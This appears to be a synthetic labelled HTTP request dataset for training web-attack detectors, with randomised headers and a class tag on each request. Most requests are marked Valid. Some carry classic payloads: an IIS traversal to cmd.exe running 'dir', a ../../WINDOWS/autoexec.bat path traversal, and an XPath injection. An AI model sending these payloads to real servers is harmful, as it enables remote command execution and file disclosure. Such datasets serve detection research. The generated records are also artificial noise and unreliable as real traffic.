Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 44.141.186.180
X-Serial-Number: 212738201929223
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37418
Start - Id: 7132
class: Valid
POST /KkLtrlbodd2stQ/dQ2E_G8YT.6tu-/libU-Ubvbscript4f@insertl/3mdetArneoe/J-jR4/ak2ayVwFf6UrZXm/ja7fiJo@61G-JrkaYR/MBshutdown4documentdU3update/exeoSAL@3wH/E7byipeat/eioose3/iizlweyiAwreq3yeiW.swf? HTTP/1.0
Content-Length: 147
Content-Language: Do,ho
Content-Encoding: deflate
Content-Location: http://7mxm.it/htnr/utoudh.pl
Content-MD5: bGNzZTJUcmxFZWJuYWhlRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Nov 04 12:26:13 CET
Last-Modified: Mon, 11 Apr 05 23:30:51 CET
Host: www.aauaej.be:02883
Connection: 1css
Accept: application/*, audio/*;q=0.9, audio/*
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: ec=eLnnwFt
Client-ip: 15.235.213.232
Cookie: 4b=ssbgsoundo;9u3bxrmNitet=6700;ttottarst=replacet;wmimePftpU9l=eoj;o1em1paepttfopt=resvexeci;emlrsKNadcj=4 sae
Cookie2: $Version="27"
Date: Wed, 01 Nov 06 20:46:38 UTC
ETag: "YWfEAKRtn_k6G1Cuo8dc"
Expect: 100-continue
From: kntoo@5rda2fql.com
If-Modified-Since: Mon, 02 Apr 07 14:40:53 UTC
If-Unmodified-Since: Tue, 21 Nov 06 21:10:20 CET
If-Match: "2Nc8Gd8Ki-rokf1xrcc"
If-None-Match: *
If-Range: Tue, 12 Sep 06 16:46:59 UTC
Max-Forwards: 8
MIME-Version: 0.7
Pragma: toMiaHS='shax'
Proxy-Authorization: Basic eWllZ29hOnFva3AwMnJl
Authorization: NTLM Y3dpdGlEQ3VxNWllYUVyZVRyZWZsaXRlc2U2ZHZvdWRvZXc5Q2lsbm9zdHdz
Range: -4356,562-2281
Referer: http://Age6hel.fr/p5Qneue.rar
TE: chunked
Trailer: If-Range
User-Agent: 2CrHbn (aLeKZdt; nie7b-L)
UA-CPU: x86
UA-Disp: 5951,911,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8126x925
Via: 3.1 185.226.106.185, 2.3 129.13.215.78:6014, HTTP/8.4 164.226.39.173
Transfer-Encoding: gzip
Upgrade: ansn/1.5, iaf15t/0.0, is2t/9.1, geco/7.2
Warning: 648 97.35.34.136 "3tu5rjnJ3zaE" 
X-Forwarded-For: 212.135.218.165
X-Serial-Number: 73109423646427331
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

e4eeOav8cn9bWh=s&llemhtpmT9IOf=i?a6heee1ehhxu&echoEnOGaselectPMmailV=aHPji7YYvxv&BQF6YSdocumentho=nxcdld7zislebwdiH&3BhavingTi-A=daidb&z6KU.9=833

End - Id: 7132
Start - Id: 44233
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 221.98.38.206:07
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Tue, 06 Sep 05 04:19:06 GMT
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: aoaigdm=rnakey;sl6yntc=sonie
From: ided@udhoes.uk
If-Modified-Since: Sat, 06 Feb 10 14:14:44 GMT
If-Unmodified-Since: Fri, 08 Jan 10 14:53:04 GMT
If-Match: "9MutcHvrPBwBNQjs4@m"
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 8364
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: Basic ZXdvdmw6dGxyZUE3bWU=
Range: 0-3876
Referer: /psako.nsf
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: hjtv/1.6.9
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: identity
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44233
Start - Id: 45398
class: PathTransversal
POST /oF0rAo9zcXmkQeZep.p7/n2JvBjmMDi@M-t/t6MtN/tAJ6GMZ/4selectposition1PcgtmD1o/n0x64NGLwfD.gif? HTTP/1.1
Content-Length: 273
Content-Language: sNF,es
Content-Encoding: deflate
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: bm1iMHl0ZUt1bmxwYm5kNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Jul 09 08:08:37 UTC
Last-Modified: Thu, 21 Oct 04 24:13:15 UTC
Host: 34.231.149.53
Connection: ttktilve
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate, compress;q=0.3
Accept-Language: te-ms
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sat, 06 Nov 04 18:35:34 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 14 Nov 09 23:45:11 UTC
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "1Nl7wxjnA0ktGHewCH"
If-None-Match: *
If-Range: Tue, 25 Apr 06 20:47:21 UTC
Max-Forwards: 74
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: qei4S 0e1e=mede
Authorization: NTLM c2JrMmhlZ0NwdXNoZGJBaE5scnNhaXNudHNldGl5c2QwbQ==
Range: 96447-,026-322
Referer: /jrnh2ehg.pl
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/3.2 (Windows; U; Win98 2.0; 8l-iR; rv:1.6.9) Gecko/77467001
UA-CPU: StrongARM
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 789x027
Via: 5gamT/1.8 118.86.132.84, HTTP/4.3 253.95.173.116, ebtE/1.3 113.240.31.129
Transfer-Encoding: compress
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 335 www.lrsn.css "oRaie" "Sat, 09 Aug 08 10:06:34 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lDt41a=r&bqrnmGI0i=h9.l@kpz_JY&mi=)oJ&en=ssetneahoadahngr&Hdmeta-FIzMac@p=wtommetaoa&o3a=01e;b&tfxmp8ai=zVmd&bt=Er&kgteosgeg1=>loowlogM&tS5nkoia=]ocmtesps&lrhiwck=i3ittd&4E=vj&pjdaxi8Tt= an&ced1Osepnelmsid=../../../WINDOWS/autoexec.bat&d26abedtihri7=eSIQK

End - Id: 45398
Start - Id: 4306
class: Valid
PUT /ESRrm5-/n@vAd/dsn2aecEetli/sLnr1/Ih7e_SgU5a7Q__s/a6fQjspeqcdreent2ctF/nph-SFH6Q/mGgnH/aW_JPcA6Ed9WQD-q/2cjn3vFUnobjectUoG.tiff? HTTP/1.0
Content-Length: 236
Content-Language: fdloyyjP,emyeierm
Content-Encoding: compress
Content-Location: /SinEs/daDkipef/dan7t/3bn4e9/qrgSliu.cfm
Content-MD5: ZHVwc2FnZXJoaXVvVGlzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Aug 07 01:30:20 GMT
Last-Modified: Mon, 17 Jan 05 21:44:11 GMT
Host: www.tPhihwtyo.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, euc-jp, windows-1258;q=0.8
Accept-Encoding: compress;q=0.4, deflate
Accept-Language: hihls-Ictgp;q=0.4, he-Odtryu, Dec7ttl-nsa, 0nulp-ti;q=0.3, e-fs
Cache-Control: no-store
Client-ip: 237.24.203.229
Cookie: l1hnleoha4ee=eEe7toni;G8obepzsee=wmtlshs;bLUm=enetcat;isyaaauiroien=)l@oeNrc;.optnO5WpO=wErcpduo4c
Cookie2: $Version="33"
Date: Wed, 18 Mar 09 14:48:13 GMT
ETag: W/"tSBUj.txme_bj4p2"
Expect: 100-continue
From: hniryitt@cesrtata.de
If-Modified-Since: Sat, 15 Jul 06 10:03:36 CET
If-Unmodified-Since: Sun, 11 Jun 06 15:53:07 CET
If-Match: *
If-None-Match: "GZ6p4Ddmpw3@oX48M"
If-Range: *
Max-Forwards: 95
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: utcbmb 1ade57=6afgps
Authorization: p80ns 1yi1e=mona0
Range: 015984-952,-362
Referer: http://l0E59VoH.net/Guetti/laetie3/Nhyat.mdb
TE: chunked,gzip;q=0.4
Trailer: Trailer
User-Agent: titnqb7oA (xFOiurC3D6)
UA-CPU: MIPS
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x229
Via: HTTP/6.3 www.eia7s8df.gif
Transfer-Encoding: compress
Upgrade: Unh/4.4
Warning: 230 www.eetm.shtml "attezh8alecnXforas" "Sun, 16 Sep 07 10:35:28 GMT"
X-Forwarded-For: 132.110.249.171
X-Serial-Number: 41906
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TlwmHeeansneeoT=h&eCm6opchG=he3&Sle=4444&eniynntnnEeoar=zb]a <T97l&3DH=876&eF=ihd&tatrneoyG= t&ss4FoD4djT&vih7wmS=245987&sp4x0niW=l:<&vRIPbnodeO0=93146&ufs8dcRm4=sx'hxUos3uu&ya=Nteo&orrxtrhpghdlmTt=31&yf3fnxt2gme=3&Ocb7gsp=0

End - Id: 4306
Start - Id: 24099
class: Valid
GET /ttc3we/gwim4/OnueBRvO/connectj.tiff?gCtf1th=2&77cenljA7Ttng=+%5Due%3DJ9riOtobjectGiftp&qtbpsvft=jol6s%25ugAi&0lt6dm=a%7En%40m7&datmstf8tf=stdin%3Erss&ses=aBigpmlheeh&ZHkY3IC10script=zi0vn&bjtrm=mnr&6emth6u=6&efbihu=R5Eoksiceh&aenjtjfNaDee=r&a1Csrc=a9Ohci6j&dateadHahioseod=06732 HTTP/1.0
Host: www.cc9nsahu0r.fr
Connection: keep-alive
Accept: text/html, video/mpeg
Accept-Charset: windows-1252;q=0.0, iso-8859-9, x-mac-chinesetrad, ks_c_5601-1987;q=0.2
Accept-Encoding: *
Accept-Language: 7sbu-laEqw2d, 3tpnsh0r-cRFm, eT-stc;q=0.9, adle-ninarbd;q=0.7, 03caay-n;q=0.8
Cache-Control: max-stale=693
Client-ip: 184.105.104.188
Cookie: eo9=sitypositiontrl;linkKEItsn88L3h=h+s8v;reE=1245
Cookie2: $Version="84"
Date: Wed, 20 Jun 07 20:41:00 GMT
ETag: "up1FPESAOB4b2.C_zxy"
Expect: njhesNbc
From: idehs@lb6ztam.biz
If-Modified-Since: Mon, 11 Jan 10 04:03:18 GMT
If-Unmodified-Since: Mon, 04 May 09 24:26:44 GMT
If-Match: "KmVz2n7PdTVYUhkbcu"
If-None-Match: "3gGSbqbLMT1OjsR"
If-Range: *
Max-Forwards: 101
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: Digest cnonce="lie0ih"
Range: 05-009,-9713,654-967
Referer: http://www.thWI5dvh.fr/m3cmsc/twiL4h/ltAdpagl.css
TE: deflate,chunked;q=0.1
Trailer: Warning
User-Agent: Mozilla/4.9 (compatible; MSIE 1.9; Linux i586; snT9onat)
UA-CPU: MIPS
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 390x221
Via: 8.1 253.27.143.212
Transfer-Encoding: wtaoin
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 539 38.106.69.86 "RmeeRevmr53usmX" "Fri, 31 Mar 06 18:40:16 GMT"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24099
Start - Id: 49037
class: XPathInjection
GET /ahordtlvarfa9eslul/GQgNF.gif?hsemyhfenpde=4575&xfzI9usr=mrptg9nrptjfFy&jelom=eeuhwssoysz&PhseJden9d=msmt%27%5D++%7C++P+%7C+++%2F%2Fuser%5B+++name%2Ftext%28++++%29%3D++%27zh&cefjoa=28892777&rtNrttetjntwzsT=73958038&9sii=939&oOID=rlgjRU7Z9&0at2VKD=bqfnh HTTP/1.0
Host: www.mnojtc.com
Connection: close
Accept: application/x-tar;q=0.5, audio/x-wav;q=0.2
Accept-Charset: windows-1254, cp-950;q=0.2
Accept-Encoding: 
Accept-Language: ebDnsed-h;q=0.1, wIEm7ne-j, uhreV4-i, tqee3-tcr;q=0.6, jz-56;q=0.2
Cache-Control: no-cache
Client-ip: 176.183.31.155
Cookie: is5gndaepewrbh=btelrrnh ;tI5=sWn+au?etc2 i;uulw2mrELq3ht=57;nnoeythAeeluh=4298;0aUCdvgroup by=po0noiwu;fo=fne3od
Cookie2: $Version="246"
Date: Tue, 14 Apr 09 06:26:20 GMT
ETag: "k-nbkP0EM4jJ4NdD2Z"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Mon, 16 Jun 08 16:19:34 CET
If-Unmodified-Since: Sat, 01 Aug 09 24:58:17 UTC
If-Match: *
If-None-Match: "5RjGOh8LcKVKM5_F1h6"
If-Range: Sat, 02 May 09 16:55:48 GMT
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://www.moreTveg.cz/ilear/Tvekhl/rtie.pl
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 6.1; ne-Ef; rv:9.8.6) Gecko/36696369
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: identity
Upgrade: sfltc/9.5, Llja/5.6
Warning: 677 1.148.139.109 "EdedporS" "Tue, 26 Jan 10 23:09:25 CET"
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49037
Start - Id: 29249
class: Valid
GET /ieotf.css?iihooaaaRhd=705745&x0gmeesvtOxi=idiiinEsEtee+&4aTofahnu=94352319&uba0bm=0181520158&iiss=dssKTFG&soi3um=yhKQK&UZ4kN-FfromRe=71094&Wum=atr&anysti=5&srdeekiefM=7716&nenhexq=222673635 HTTP/1.0
Host: 148.51.82.12
Connection: gnssxc
Accept: application/zip;q=0.6, application/*;q=0.6, audio/x-wav
Accept-Charset: x-mac-greek, x-mac-icelandic;q=0.3, utf-7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 56.250.51.147
Cookie: lrgoset=tM5z9
Cookie2: $Version="108"
Date: Wed, 29 Sep 04 01:30:23 CET
ETag: W/"dBlK_bBo7IbV@EY"
Expect: 100-continue
From: nnhgpdL@fDut.cz
If-Modified-Since: Mon, 10 Jan 05 06:52:47 CET
If-Unmodified-Since: Fri, 16 Sep 05 15:31:42 UTC
If-Match: "2EP.4O@ALnqWLLTY31D"
If-None-Match: *
If-Range: "8_dQ2cJxyUyh2T.J4gb"
Max-Forwards: 9001
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM ZUkxZXlvcnNhbjhhcmVpYTNsbGhhMWZsb3NodjVmZjRyYXY3
Authorization: NTLM YVNpeGh0eXBpbGljc3BpZWpjNnJ0aW9leW9jb2pJYWdzbG93c2R0ZGhlV3Rz
Range: 8896-28646
Referer: http://www.teHt06k.fr/eqelhd/dryRn/adtxJe.asmx
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: cctiUdjstx (507bUjHgTC; 5ij2NeOR; i5G8w0Ru; na-6VHwHB)
UA-CPU: PowerPC
UA-Disp: 821,9658,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: 9.0 80.212.232.26
Transfer-Encoding: nlne; hmgtci1e=SyEfaIwj
Upgrade: 94q/7.8, xee/9.4, reehgp/6.0
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 184.221.151.22
X-Serial-Number: 4249614312362158832
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29249
Start - Id: 1764
class: Valid
GET /wzhlsewc8drwlz/TtRalo0mldnQ/tTtQVw0w@cIPaZKSLqTi/ces6drc7/Q1AJmailAbo/ta/elxUJ8dQlV3tYn/o2j-scriptBkj.png?taooes=736 HTTP/1.1
Host: www.eyvoeelesa.be
Connection: rpfnsli
Accept: video/*;q=0.1, text/plain;q=0.8
Accept-Charset: x-mac-turkish, windows-1251;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-age=524
Client-ip: 80.173.254.54
Cookie: fykhmo=ahLtd;tmO3jaEfAA=eOleeieinf
Cookie2: $Version="36"
Date: Sun, 13 Jan 08 23:59:58 CET
ETag: W/"fPhhmihcqLOZkwPCSt"
Expect: 8RdKw
From: n9mf@hcs9solg.ch
If-Modified-Since: Fri, 26 Nov 04 20:51:57 GMT
If-Unmodified-Since: Sat, 04 Feb 06 22:09:39 UTC
If-Match: *
If-None-Match: "yxPie0eLu8mwBLr2j5"
If-Range: Sat, 13 Aug 05 10:18:49 CET
Max-Forwards: 5222
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM RXBldG1hemFldHVvNm5uNDhwZW9hdWVzb2l0ZXljVHRidGg=
Range: 2506-
Referer: /76th.jpg
TE: trailers,gzip
Trailer: Accept
User-Agent: iCkF6aMZD http://www.ptsf.net
UA-CPU: PowerPC
UA-Disp: 8023,517,8
UA-OS: WinNT
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: jnEek; nitnOP=ssere3Ma
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 139 78.74.97.56:3343 "baAves6intsOfariudt" "Tue, 24 Nov 09 11:16:38 GMT"
X-Forwarded-For: 162.29.213.245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1764
Start - Id: 3662
class: Valid
GET /oT/ooeiNasts/nlFres1lnneD1nxtc/uuMoE.hC6WDlI/jfRprocessing-instructioni4aboot.iniwscriptunionNW/ihsszo4iue0ZTuni0n.css? HTTP/1.1
Host: 116.57.75.59
Connection: 1esio7q
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=34119
Client-ip: 107.9.247.76
Cookie: thIsrzymtrtt=t q:qoaunionwhere hpeCh 
Cookie2: $Version="5"
Date: Fri, 30 Jun 06 01:13:02 CET
ETag: W/"QPdlQShUKUiYq.7"
Expect: 100-continue
From: atmiA@frsUErVnr.fr
If-Modified-Since: Thu, 18 Nov 04 14:04:56 CET
If-Unmodified-Since: Thu, 02 Nov 06 16:21:56 UTC
If-Match: *
If-None-Match: "MDqW3mruBf59Elu"
If-Range: *
Max-Forwards: 09
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bnJudXQ6b2VlMQ==
Authorization: go2e auenjae=otlml0in
Range: -716695,38416-608
Referer: http://Cs2nhip.cz/nthi.gif
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 9.4; es-sa; rv:5.6.5) Gecko/60661971
UA-CPU: MIPS
UA-Disp: 1100,347,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: FTP/1.8 5.196.147.162:3778, FTP/1.2 www.OhmesiMh.js, elaftn/2.4 www.uneSlnte.jpeg
Transfer-Encoding: Eh00t
Upgrade: oail/4.8, aTsyih/8.0
Warning: 645 www.las2ihke.js "0xmtaiit6e4g" "Thu, 25 May 06 21:49:28 GMT"
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 760698596875297
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3662
Start - Id: 5193
class: Valid
POST /r7utiRmrx5/i51z0aILgghlWCwa9Nbj/8betweenjFQD0zhttps6g9/l9GzHBX05uvjQCv5aU/9skJBzgroup byPLSbk4T/7Hw7IP/aNTu27ZD4k85rl91rkkG/aLroJ3gjkTchsV9-3U/Ltcn5mtb.php? HTTP/1.0
Content-Length: 194
Content-Language: oead,lc5w,aorMgN
Content-Encoding: deflate
Content-Location: /sAstlmti.doc
Content-MD5: ZW5naGhldmU4YjNmNDllbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 04 17:31:53 GMT
Last-Modified: Thu, 15 Feb 07 05:34:42 UTC
Host: www.dciyta.net
Connection: dd3nrva
Accept: */*
Accept-Charset: iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 81.147.169.139
Cookie: eyltetev0ir=mustdin5;imuomBaxle3=Khhnaconnectidisob uiX;dNseeicgonth=rnsttueuh;GiamEgm=ionodel
Cookie2: $Version="250"
Date: Fri, 31 Jul 09 04:58:15 CET
ETag: W/"rLV7rPzIFtVMdQmWNN0"
Expect: 100-continue
From: poNh5pmt@ler5Ht.st
If-Modified-Since: Sun, 14 Dec 08 02:36:18 GMT
If-Unmodified-Since: Tue, 03 Feb 09 08:02:30 GMT
If-Match: "hmUqOySJmLYRKze0"
If-None-Match: "SGtDXR5f-WauSva"
If-Range: "rpEdEyFFCiBbEclGqg0N"
Max-Forwards: 8
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM cnptb29HaWVua0huZUF5b3luenVlYWlUcGFoaWVpbkliZXJFbHVhb2t0YTlX
Authorization: Digest realm
Range: -71
Referer: http://www.ingCip.fr/eazt/aEMs.nsf
TE: deflate;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/4.5 (compatible; Konqueror/0.5; Unix; eSTyg; yan1d)
UA-CPU: MIPS
UA-Disp: 5363,7210,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4221x6356
Via: oeD3he/2.4 21.141.239.203, 3.4 www.Nwsei5r.html
Transfer-Encoding: deflate
Upgrade: cpuy/9.4, tco/4.5, 15iM1/7.2
Warning: 443 www.Astm.js "ecosRycyRrtgnose" "Wed, 07 May 08 16:47:07 CET"
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

adarcduH=otxcJVWSG&penio=/ne&utjlaokaTtw=eorn8l&ieRdIOsMctd=etade0rtnimOv'qnp&d95ltut6ctoctiu=lFEX6iYCm0&ar=q&M7ony=767174&w7yinaeear47l=ooei&iepsh=Oapsn3in8scriptnotziusr&uee2ikeer0etpsr=49

End - Id: 5193
Start - Id: 3153
class: Valid
GET /tLgT/tlt7Enitiecw98ehoC/ckmuXoaeke/nsdee4simbes.png?bmebi=62&UiaetinrNd=781419271&zu@lnXE6=UL&OCKUL5IY=agp+eo&5IPd1zIrksystem=90&e93eu=056950&y7dElY=%2F6%29&oodetn13eke=qT3ua&oidheMB=42187801&m1eellnhnp=elocation&hcswmraot7es7e=nMhhp&nelm8hhsoioiu=Yd HTTP/1.1
Host: 229.24.57.213
Connection: close
Accept: application/*;q=0.4, image/png;q=0.4, application/*;q=0.7
Accept-Charset: x-mac-greek, iso-2022-jp, utf-7, gb2312;q=0.6, utf-8;q=0.2
Accept-Encoding: 
Accept-Language: Intotts-8, hcMttphn-syeos0, lafeb-v7wioe, u-xywar
Cache-Control: 1lxen='n'
Client-ip: 25.108.161.69
Cookie: s5c9itmkll1ne=45923310;JTsXK=g3eyei0to3ohli9ie9;otl9orldUeuio=s1rra;rsgwplhi=0I-ZtGWY;cf8iHer=292896;ddp8ettev6t=08i$adP5rmunionorit
Cookie2: $Version="69"
Date: Thu, 29 Apr 10 16:34:50 UTC
ETag: W/"wNg_fjKSBvhTnSzuv"
Expect: 100-continue
From: 6jethpt@ukvalodoo.net
If-Modified-Since: Sun, 06 Sep 09 22:19:42 GMT
If-Unmodified-Since: Sat, 08 Jul 06 21:16:56 GMT
If-Match: "4CXHc1AMbS19eJPJP"
If-None-Match: *
If-Range: Sat, 24 Apr 10 18:27:50 UTC
Max-Forwards: 9
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZWl2bDpsdElobkhj
Authorization: uloet olioEle=efonteuw
Range: -82153
Referer: http://Sft2lpea.uk/iasfgrve.jpg
TE: deflate;q=0.3,chunked;q=0.4
Trailer: Date
User-Agent: hiexOe4w3f (nI@rnnO; d3@lNj)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5717x5114
Via: 2.4 www.2muniaq.png, HTTP/4.5 48.167.214.235:5, 0.6 www.ereds.html
Transfer-Encoding: identity
Upgrade: ianerr/8.5
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 181.111.92.64
X-Serial-Number: 37153368506514
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3153
Start - Id: 16681
class: Valid
GET /rCi3c.tiff?ednlwA2=f%3EwP5nodeacce%26yc&t9eungedosewt=oinputtn%7E%3AMzkq%25wv%7Cr&hEetyblSi=7363386&ifenisetid=Cssta+&al=rhtoTfehY&jHgcsKH=-%3E&kctsH=nm6u+h++passwd&NZ-9EZF3C4G=%3Chttps0s%24&leeQbh6Mc=sWDtcOD&yemrnx1rtZi4=7 HTTP/1.1
Host: www.lmT4ep9t.fr
Connection: wiehwnoi
Accept: video/mpeg;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 0thypne-oee;q=0.1
Cache-Control: no-cache
Client-ip: 227.125.228.63
Cookie: deletepcPK=S=;4oDashukzektK3=73171;sz63Setc86=9i1w_vvvXhv4;lnvOuglsrhqcmE=v;8Drxbx@Ex=3262;sreAetkfdehSe=saEa5 
Cookie2: $Version="672"
Date: Wed, 04 May 05 03:06:59 CET
ETag: "B1pwQY0mt0Vcypg@Iil"
Expect: 100-continue
From: noedlreb@rlhth.be
If-Modified-Since: Wed, 02 Jun 04 15:40:11 CET
If-Unmodified-Since: Sun, 23 Aug 09 03:25:16 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 19 May 06 13:16:07 GMT
Max-Forwards: 116
MIME-Version: 2.5
Pragma: eembii='oqla'
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: Basic c2FtZHNlOmxjc3BhbjVt
Range: 251-5
Referer: /hepe9nuW/oiuo9k.txt
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: meeEaAi1n
UA-CPU: 68000
UA-Disp: 0786,0517,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 0.0 www.ictAst.tiff
Transfer-Encoding: gzip
Upgrade: bloll/7.2
Warning: 589 www.e9meoi.gif "ihsYh5Assid" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 93584003458
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16681
Start - Id: 13926
class: Valid
GET /S5a/7ezdscriptO1I/9MOFUR/z7dOeBATB.sgwU1w/hH4yaGgtijserrei/elo/M599dsA_J2x-N/p3.jsp?z.metaySXqMA.=v%25e1igad%25on8l&5uefe=etisnulls&gFacrtdTa=zLEi%7Cwt9r&meebGvadpyo=83&oorlm=oft&rct1PzLbnsc=92267662&7nciBss=ieaEkeadwhtjERoi&ocdriyeB1ltefoa=67 HTTP/1.1
Host: 253.124.192.12
Connection: 8c4sddc
Accept: video/*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.7, iso-8859-2, isiri-3342;q=0.3
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: min-fresh=7276
Client-ip: 179.61.107.5
Cookie: Mr0_0MUsF.=21;thgiEeptirluT=9397942;ttnnro60lenf8nz=niahenpetiS
Cookie2: $Version="2"
Date: Fri, 02 May 08 09:47:17 GMT
ETag: "bJbD_A9@czsMuEwnSn"
Expect: aedx8
From: mshmtny@eieiosii.fr
